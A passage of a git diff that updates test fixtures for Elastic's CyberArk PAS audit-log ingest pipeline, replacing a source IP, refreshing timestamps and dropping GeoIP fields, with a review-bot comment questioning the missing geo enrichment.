Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", 
@@ -278,7 +278,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.491240700Z", + "ingested": "2021-12-09T13:36:41.659752800Z", "original": "\u003c5\u003e1 2021-03-10T23:39:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:28\",\"IsoTimestamp\":\"2021-03-10T23:39:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountB;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"25\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615419568\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", 
@@ -383,7 +383,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.491244900Z", + "ingested": "2021-12-09T13:36:41.659756400Z", "original": "\u003c5\u003e1 2021-03-15T10:12:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e24\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=components;username=x_accountA;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"28\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615803143\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Inactive\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:24\",\"IsoTimestamp\":\"2021-03-15T10:12:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountA;\",\"Message\":\"CPM Change 
Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"28\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615803143\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log index 7284820d8e4..efc7388178f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log 
@@ -1,4 +1,4 @@ -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update 
Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json
index e083c4b0284..e1bdf0441e2 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json
@@ -7,20 +7,8 @@
}
},
"source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
},
"tags": [
"preserve_original_event"
@@ -37,7 +25,7 @@
},
"related": {
"ip": [
- "81.32.170.205"
+ "67.43.156.13"
]
},
"cyberarkpas": {
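Review bot: The regenerated expected output drops `source.geo` entirely for 67.43.156.13 rather than replacing the Barcelona enrichment that 81.32.170.205 produced, and the -73, -139 and -205 hunks of this file do the same. If the point of moving to the supported IP subset is deterministic GeoIP enrichment from the test database, the new address should still yield a `source.geo` block, and an output with no geo fields at all suggests the fixture was regenerated without that database loaded, which would make the test fail once it runs against it. Worth re-running the pipeline test with the GeoIP test database and checking whether geo fields come back before treating this fixture as final. The `related.ip` and `station` updates in the adjacent hunks are consistent with the new address.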
@@ -45,7 +33,7 @@
"severity": "Info",
"rfc5424": true,
"iso_timestamp": "2021-03-10T09:11:21Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
"action": "Add/Update Group",
"source_user": "PSMMaster",
"message": "Add/Update Group",
@@ -60,8 +48,8 @@
"event": {
"severity": 2,
"action": "add/update group",
- "ingested": "2021-06-09T10:24:29.637782200Z",
- "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:36:42.237014100Z",
+ "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}",
"code": "259",
"kind": "event"
}
@@ -73,20 +61,8 @@
}
},
"source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
},
"tags": [
"preserve_original_event"
@@ -103,7 +79,7 @@
},
"related": {
"ip": [
- "81.32.170.205"
+ "67.43.156.13"
]
},
"cyberarkpas": {
@@ -111,7 +87,7 @@
"severity": "Info",
"rfc5424": true,
"iso_timestamp": "2021-03-10T09:11:21Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
"action": "Add/Update Group",
"source_user": "PSMAppUsers",
"message": "Add/Update Group",
@@ -126,8 +102,8 @@
"event": {
"severity": 2,
"action": "add/update group",
- "ingested": "2021-06-09T10:24:29.637798100Z",
- "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:36:42.237022200Z",
+ "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}",
"code": "259",
"kind": "event"
}
@@ -139,20 +115,8 @@
}
},
"source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
},
"tags": [
"preserve_original_event"
@@ -169,7 +133,7 @@
},
"related": {
"ip": [
- "81.32.170.205"
+ "67.43.156.13"
]
},
"cyberarkpas": {
@@ -177,7 +141,7 @@
"severity": "Info",
"rfc5424": true,
"iso_timestamp": "2021-03-10T09:11:35Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
"action": "Add/Update Group",
"source_user": "PSMP_ADB_AppUsers",
"message": "Add/Update Group",
@@ -192,8 +156,8 @@
"event": {
"severity": 2,
"action": "add/update group",
- "ingested": "2021-06-09T10:24:29.637803100Z",
- "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:36:42.237027700Z",
+ "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}",
"code": "259",
"kind": "event"
}
@@ -205,20 +169,8 @@
}
},
"source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
},
"tags": [
"preserve_original_event"
@@ -235,7 +187,7 @@
},
"related": {
"ip": [
- "81.32.170.205"
+ "67.43.156.13"
]
},
"cyberarkpas": {
@@ -243,7 +195,7 @@
"severity": "Info",
"rfc5424": true,
"iso_timestamp": "2021-03-10T17:59:29Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
"action": "Add/Update Group",
"source_user": "PSMLiveSessionTerminators",
"message": "Add/Update Group",
@@ -258,8 +210,8 @@
"event": {
"severity": 2,
"action": "add/update group",
- "ingested": "2021-06-09T10:24:29.637807400Z",
- "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMLiveSessionTerminators\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:36:42.237031800Z",
+ "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMLiveSessionTerminators\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}",
"code": "259",
"kind": "event"
}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log
index bff61c277da..709d22f77a2 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log 
@@ -1,14 +1,14 @@ -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:58:01Z VAULT 
